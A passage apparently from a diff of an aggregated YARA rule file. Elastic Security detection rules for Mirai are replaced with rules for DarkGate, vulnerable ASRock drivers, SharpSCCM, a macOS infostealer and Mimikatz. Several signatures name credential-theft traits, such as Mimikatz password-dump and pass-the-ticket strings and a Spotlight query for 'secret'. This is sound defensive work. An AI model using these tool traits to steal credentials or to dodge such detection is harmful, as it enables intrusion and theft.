"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b7760e73195c3ea8566f3ff0427d85d6f35c6eec7ee9184f3aceab06da8845d8" + logic_hash = "212f96ca964aceeb80c6d3282d488cfbb74aeffb9c0c9dd840a3a28f9bbdcbea" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "a8a4252c6f7006181bdb328d496e0e29522f87e55229147bc6cf4d496f5828fb" + fingerprint = "b00bffbdac79c5022648bf8ca5a238db7e71f3865a309f07d068ee80ba283b82" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 23 CB 67 4C 94 11 6E 75 EC A6 76 98 23 CC 80 CF AE 3E A6 0C } + $a = { 4D 49 70 67 41 59 4B 6B 42 5A 59 53 65 4D 6B 61 70 41 42 48 4D 5A 43 63 44 44 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Ec591E81 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Darkgate_Fa1F1338 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Darkgate (Windows.Trojan.DarkGate)" author = "Elastic Security" - id = "ec591e81-8594-4317-89b0-0fb4d43e14c1" - date = "2021-01-12" - modified = "2021-09-16" + id = "fa1f1338-c920-4db9-a7ec-cd11d7e1558b" + date = "2023-12-14" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1224-L1242" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7d45a4a128c25f317020b5d042ab893e9875b6ff0ef17482b984f5b3fe87e451" - logic_hash = "f2a147fe7f98d2b3141a1fda118ee803c81d9bc6f498bfaf3557665397eb44da" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DarkGate.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1fce9ee9254dd0641387cc3b6ea5f6a60f4753132c20ca03ce4eed2aa1042876" + logic_hash = "d5447a57fc57af52c263b84522346a3e94a464a698de8be77eab3b56156164f2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fe3d305202ca5376be7103d0b40f746fc26f8e442f8337a1e7c6d658b00fc4aa" + fingerprint = "182481e23eb10f0a8b7d0d536e2d8d36ab5e51fd798caebff4d38d55b5549244" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 22 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A 3C } + $str0 = "DarkGate has recovered from a Critical error" + $str1 = "Executing DarkGate inside the new desktop..." + $str2 = "Restart Darkgate " condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Mirai_0Eba3F5A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Darkgate_07Ef6F14 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Darkgate (Windows.Trojan.DarkGate)" author = "Elastic Security" - id = "0eba3f5a-1aa8-4dc8-9f63-01bc4959792a" - date = "2021-01-12" - modified = "2021-09-16" + id = "07ef6f14-4eb5-4c15-94af-117c68106104" + date = "2023-12-14" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1244-L1262" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2e4f89c76dfefd4b2bfd1cf0467ac0324026355723950d12d7ed51195fd998cf" - logic_hash = "bcb2f1e1659102f39977fac43b119c58d6c72f828c3065e2318f671146e911da" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DarkGate.yar#L23-L42" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1fce9ee9254dd0641387cc3b6ea5f6a60f4753132c20ca03ce4eed2aa1042876" + logic_hash = "2820286b362b107fc7fc3ec8f1a004a7d7926a84318f2943f58239f1f7e8f1f0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c0f4f9a93672bce63c9e3cfc389c73922c1c24a2db7728ad7ebc1d69b4db150f" + fingerprint = "fd0aab53bddd3872147aa064a571d118cc00a6643d72c017fe26f6e0d19288e1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C3 55 48 89 E5 48 83 EC 40 48 89 7D C8 89 F0 66 89 45 C4 C7 45 DC 01 00 } + $binary0 = { 8B 04 24 0F B6 44 18 FF 33 F8 43 4E } + $binary1 = { 8B D7 32 54 1D FF F6 D2 88 54 18 FF 43 4E } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_E43A8744 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Asrock_986D2D3C : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Vulndriver Asrock (Windows.VulnDriver.Asrock)" author = "Elastic Security" - id = "e43a8744-1c52-4f95-bd16-be6722bc4d1a" - date = "2021-01-12" - modified = "2021-09-16" + id = "986d2d3c-96d1-4c74-a594-51c6df3b2896" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1264-L1282" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f363d9bd2132d969cd41e79f29c53ef403da64ca8afc4643084cc50076ddfb47" - logic_hash = "17c52d2b720fa2e98c3e9bb077525a695a6e547a66e8c44fcc1e26e48df81adf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Asrock.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838" + logic_hash = "d767a1ecdff557753f80ac9d73f02364dd035f7a287d0f260316f807364af2d5" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "e7ead3d1a51f0d7435a6964293a45cb8fadd739afb23dc48c1d81fbc593b23ef" - severity = 100 + tags = "FILE" + fingerprint = "17a021c4130a41ca6714f2dd7f33c100ba61d6d2d4098a858f917ab49894b05b" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 23 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A 3C } + $str1 = "\\AsrDrv106.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Mirai_6E8E9257 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Asrock_Cdf192F9 : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Vulndriver Asrock (Windows.VulnDriver.Asrock)" author = "Elastic Security" - id = "6e8e9257-a6d5-407a-a584-4656816a3ddc" - date = "2021-01-12" - modified = "2021-09-16" + id = "cdf192f9-c62f-4e00-b6a9-df85d10fee99" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1284-L1301" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "67973257e578783838f18dc8ae994f221ad1c1b3f4a04a2b6b523da5ebd8c95b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Asrock.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d" + logic_hash = "2f844b6d3fa19fd39097395175162578ad71d78c61dad104efd320cd8285fa6b" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "4bad14aebb0b8c7aa414f38866baaf1f4b350b2026735de24bcf2014ff4b0a6a" - severity = 100 + tags = "FILE" + fingerprint = "f27c61c67b51ab88994742849dcd1311064ef0cacddb57503336d08f45059060" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 53 83 EC 04 8B 5C 24 18 8B 7C 24 20 8A 44 24 14 8A 54 24 1C 88 54 } + $str1 = "\\AsrDrv103.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Mirai_Ac253E4F : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Asrock_0Eca57Dc : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Name: AsrSetupDrv103.sys, Version: 1.00.00.0000 built by: WinDDK" author = "Elastic Security" - id = "ac253e4f-b628-4dd0-91f1-f19099286992" - date = "2021-01-12" - modified = "2021-09-16" + id = "0eca57dc-3800-4b0f-99dd-151fcac82136" + date = "2023-07-20" + modified = "2023-07-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1303-L1321" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9" - logic_hash = "1ab463fce01148c2cc95659fdf8b05e597d9b4eeabe81a9cdfa1da3632d72291" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Asrock.yar#L41-L62" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9d9346e6f46f831e263385a9bd32428e01919cca26a035bbb8e9cb00bf410bc3" + hash = "a0728184caead84f2e88777d833765f2d8af6a20aad77b426e07e76ef91f5c3f" + logic_hash = "82a0cba571dc58ed8d3fd87d3650ec0c1016e6c8e972547f6120ba91c8febce1" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea" - severity = 100 + tags = "FILE" + fingerprint = "6c73b37f5e749161b4fb2f076e82ceb02345894b5db8e1a187019b54e3d1a154" + threat_name = "Windows.Vulndriver.Asrock" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 31 C9 EB 0A 6B C1 0A 0F BE D2 8D 4C 02 D0 8A 17 48 FF C7 8D } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 [1-8] 41 00 73 00 72 00 53 00 65 00 74 00 75 00 70 00 44 00 72 00 76 00 31 00 30 00 33 00 2E 00 73 00 79 00 73 } + $file_version = { 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E [1-8] 31 00 2E 00 30 00 30 00 2E 00 30 00 30 00 2E 00 30 00 30 00 30 00 30 00 20 00 62 00 75 00 69 00 6C 00 74 00 20 00 62 00 79 00 3A 00 20 00 57 00 69 00 6E 00 44 00 44 00 4B } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $file_version } -rule ELASTIC_Linux_Trojan_Mirai_994535C4 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rooter_C8D08D3A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Trojan Rooter (Linux.Trojan.Rooter)" author = "Elastic Security" - id = "994535c4-77a6-4cc6-b673-ce120be8d0f4" - date = "2021-01-12" + id = "c8d08d3a-ff9c-4545-9f09-45fbe5b534f3" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1323-L1341" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "376a2771a2a973628e22379b3dbb9a8015c828505bbe18a0c027b5d513c9e90d" - logic_hash = "c83c8c9cdfea1bf322115e5b23d751b226a5dbf42fc41faac172d36192ccf31f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rooter.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f55e3aa4d875d8322cdd7caa17aa56e620473fe73c9b5ae0e18da5fbc602a6ba" + logic_hash = "c91f3112cc61acec08ab3cd59bab2ae833ba0d8ac565ffb26a46982f38af0e71" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a3753e29ecf64bef21e062b8dec96ba9066f665919d60976657b0991c55b827b" + fingerprint = "2a09f9fabfefcf44c71ee17b823396991940bedd7a481198683ee3e88979edf4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -79168,28 +79579,28 @@ rule ELASTIC_Linux_Trojan_Mirai_994535C4 : FILE MEMORY os = "linux" strings: - $a = { 20 74 07 31 C0 48 FF C3 EB EA FF C0 83 F8 08 75 F4 48 8D 73 03 } + $a = { D8 DC 04 08 BB 44 C3 04 08 CD 80 C7 05 48 FB 04 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_A68E498C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Truncpx_894D60F8 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Trojan Truncpx (Linux.Trojan.Truncpx)" author = "Elastic Security" - id = "a68e498c-0768-4321-ab65-42dd6ef85323" - date = "2021-01-12" + id = "894d60f8-bea6-4b09-b8ab-526308575a01" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1343-L1361" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" - logic_hash = "e4552813dc92b397c5ba78f32ee6507520f337b55779a3fc705de7e961f8eb8f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Truncpx.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2f09f2884fd5d3f5193bfc392656005bce6b935c12b3049ac8eb96862e4645ba" + logic_hash = "9bc0a7fbddac532b53c72681f349bca0370b1fe6fb2d16f539560085b3ec4be3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883" + fingerprint = "440ce5902642aeef56b6989df4462d01faadc479f1362c0ed90d1011e8737bc3" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -79197,287 +79608,358 @@ rule ELASTIC_Linux_Trojan_Mirai_A68E498C : FILE MEMORY os = "linux" strings: - $a = { 10 39 D0 7E 25 8B 4C 24 38 01 D1 8A 11 8D 42 9F 3C 19 77 05 8D } + $a = { B9 51 FE 88 63 A1 08 08 09 C5 1A FF D3 AB B2 28 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_88De437F : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Executeassembly_F41F4Df6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Hacktool Executeassembly (Windows.Hacktool.ExecuteAssembly)" author = "Elastic Security" - id = "88de437f-9c98-4e1d-96c0-7b433c99886a" - date = "2021-01-12" - modified = "2021-09-16" + id = "f41f4df6-03de-4a03-9dfa-4f9d0f51c2de" + date = "2023-03-28" + modified = "2023-04-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1363-L1381" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" - logic_hash = "233dbf3d13c35f4c9c7078d67ea60086355c801ce6515f9d3c518e95afd39d85" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_ExecuteAssembly.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a468ba2ba77aafa2a572c8947d414e74604a7c1c6e68a0b87fbfce4f8854dd61" + logic_hash = "ab72dec636a96338e16fd57f2db4bb52e38fe61315b42c2ffe9c4566fc0326d3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea" + fingerprint = "4875f516551517ec9423f04a9636b65fc717b9e2c9c40379b027ab126e593d23" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0 } + $bytes0 = { 33 D8 8B C3 C1 E8 05 03 D8 8B C3 C1 E0 04 33 D8 8B C3 C1 E8 11 03 D8 8B C3 C1 E0 19 33 D8 8B C3 C1 E8 06 03 C3 } + $bytes1 = { 81 F9 8E 4E 0E EC 74 10 81 F9 AA FC 0D 7C 74 08 81 F9 54 CA AF 91 75 43 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_95E0056C : FILE MEMORY +rule ELASTIC_Macos_Infostealer_Mdquerysecret_5535Ab96 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Infostealer Mdquerysecret (MacOS.Infostealer.MdQuerySecret)" author = "Elastic Security" - id = "95e0056c-bc07-42cf-89ab-6c0cde3ccc8a" - date = "2021-01-12" - modified = "2021-09-16" + id = "5535ab96-36aa-42ed-ab85-d8fd7fa6a368" + date = "2023-04-11" + modified = "2024-08-19" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1383-L1401" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380" - logic_hash = "9e34891d28034d1f4fc3da5cb99df8fc74f0b876903088f5eab5fe36e0e0e603" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Infostealer_MdQuerySecret.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c755e617b9dd41505bb225ea836ecdde8f3f6f9ab7ae79697e6d85190e206c41" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94" + fingerprint = "4fdad65ffdce106e837bbec747e63269f782a9b1ab2cfa9d2db204d252960ab4" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 50 46 00 13 10 11 16 17 00 57 51 47 50 00 52 43 51 51 00 43 } + $string1 = /kMDItemTextContent\s{1,50}==\s{1,50}\S{1,50}secret/ ascii wide nocase + $string2 = /kMDItemDisplayName\s{1,50}==\s{1,50}\S{1,50}secret\S{1,50}/ ascii wide nocase condition: - all of them + any of ($string1,$string2) } -rule ELASTIC_Linux_Trojan_Mirai_B548632D : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Sharpsccm_9Bef8Dab : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Hacktool Sharpsccm (Windows.Hacktool.SharpSCCM)" author = "Elastic Security" - id = "b548632d-7916-444a-aa68-4b3e38251905" - date = "2021-01-12" - modified = "2021-09-16" + id = "9bef8dab-af2e-46be-811a-0ac78d74a4ef" + date = "2024-03-25" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1403-L1421" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "639d9d6da22e84fb6b6fc676a1c4cfd74a8ed546ce8661500ab2ef971242df07" - logic_hash = "bfb46457f8b79548726e3988d649f94e04f26f9e546aae70ece94defae6bab8a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpSCCM.yar#L1-L31" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2e169c4fd16627029445bb0365a2f9ee61ab6b3757b8ad02fd210ce85dc9c97f" + logic_hash = "560c780934a63b3c857a09841c09cbc350205868c696fac958e249e1379cc865" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8b355e9c1150d43f52e6e9e052eda87ba158041f7b645f4f67c32dd549c09f28" + fingerprint = "dfbb7f142628eb7dc6c96dd271562d88a0970534af85464c10232ec01f58e35b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 0B 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A } + $name = "SharpSCCM" wide fullword + $s1 = "--relay-server" wide fullword + $s2 = "--username" wide fullword + $s3 = "--domain" wide fullword + $s4 = "--sms-provider" wide fullword + $s5 = "--wmi-namespace" wide fullword + $s6 = "--management-point" wide fullword + $s7 = "--get-system" wide fullword + $s8 = "--run-as-user" wide fullword + $s9 = "--register-client" wide fullword + $s10 = "MS_Collection" wide fullword + $s11 = "SOFTWARE\\Microsoft\\CCM" wide fullword + $s12 = "CCM_POST" wide fullword condition: - all of them + ($name and 2 of ($s*)) or 7 of ($s*) } -rule ELASTIC_Linux_Trojan_Mirai_E0Cf29E2 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Mimikatz_1388212A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Hacktool Mimikatz (Windows.Hacktool.Mimikatz)" author = "Elastic Security" - id = "e0cf29e2-88d7-4aa4-b60a-c24626f2b246" - date = "2021-01-12" - modified = "2021-09-16" + id = "1388212a-2146-4565-b93d-4555a110364f" + date = "2021-04-13" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1423-L1440" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "693e27da8cbab32954cc2c9ba648151ad9fc21fe53251628145d7b436ec5e976" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Mimikatz.yar#L1-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "66b4a0681cae02c302a9b6f1d611ac2df8c519d6024abdb506b4b166b93f636a" + logic_hash = "1b717453810455e3f530e399f5f9f163d1ad0d71a5464fa5c68aa82edd699cda" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f" + fingerprint = "dbbdc492c07e3b95d677044751ee4365ec39244e300db9047ac224029dfe6ab7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01 } + $a1 = " Password: %s" wide fullword + $a2 = " * Session Key : 0x%08x - %s" wide fullword + $a3 = " * Injecting ticket : " wide fullword + $a4 = " ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )" wide fullword + $a5 = "Remove mimikatz driver (mimidrv)" wide fullword + $a6 = "mimikatz(commandline) # %s" wide fullword + $a7 = " Password: %s" wide fullword + $a8 = " - SCardControl(FEATURE_CCID_ESC_COMMAND)" wide fullword + $a9 = " * to 0 will take all 'cmd' and 'mimikatz' process" wide fullword + $a10 = "** Pass The Ticket **" wide fullword + $a11 = "-> Ticket : %s" wide fullword + $a12 = "Busylight Lync model (with bootloader)" wide fullword + $a13 = "mimikatz.log" wide fullword + $a14 = "Log mimikatz input/output to file" wide fullword + $a15 = "ERROR kuhl_m_dpapi_masterkey ; kull_m_dpapi_unprotect_domainkey_with_key" wide fullword + $a16 = "ERROR kuhl_m_lsadump_dcshadow ; unable to start the server: %08x" wide fullword + $a17 = "ERROR kuhl_m_sekurlsa_pth ; GetTokenInformation (0x%08x)" wide fullword + $a18 = "ERROR mimikatz_doLocal ; \"%s\" module not found !" wide fullword + $a19 = "Install and/or start mimikatz driver (mimidrv)" wide fullword + $a20 = "Target: %hhu (0x%02x - %s)" wide fullword + $a21 = "mimikatz Ho, hey! I'm a DC :)" wide fullword + $a22 = "mimikatz service (mimikatzsvc)" wide fullword + $a23 = "[masterkey] with DPAPI_SYSTEM (machine, then user): " wide fullword + $a24 = "$http://blog.gentilkiwi.com/mimikatz 0" ascii fullword + $a25 = " * Username : %wZ" wide fullword condition: - all of them + 3 of ($a*) } -rule ELASTIC_Linux_Trojan_Mirai_1754B331 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Mimikatz_674Fd079 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detection for default mimikatz memssp module" author = "Elastic Security" - id = "1754b331-5704-43c1-91be-89c7a0dd29a4" - date = "2021-01-12" - modified = "2021-09-16" + id = "674fd079-f7fe-4d89-87e7-ac11aa21c9ed" + date = "2021-04-14" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1442-L1460" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0d89fc59d0de2584af0e4614a1561d1d343faa766edfef27d1ea96790ac7014b" - logic_hash = "fde04b0e31a00326f9d011198995999ff9b15628f5ff4139ec7dec19ac0c59c9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Mimikatz.yar#L45-L77" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "66b4a0681cae02c302a9b6f1d611ac2df8c519d6024abdb506b4b166b93f636a" + logic_hash = "f63f3de05dd4f4f40cda6df67b75e37d7baa82c4b4cafd3ebdca35adfb0b15f8" score = 75 quality = 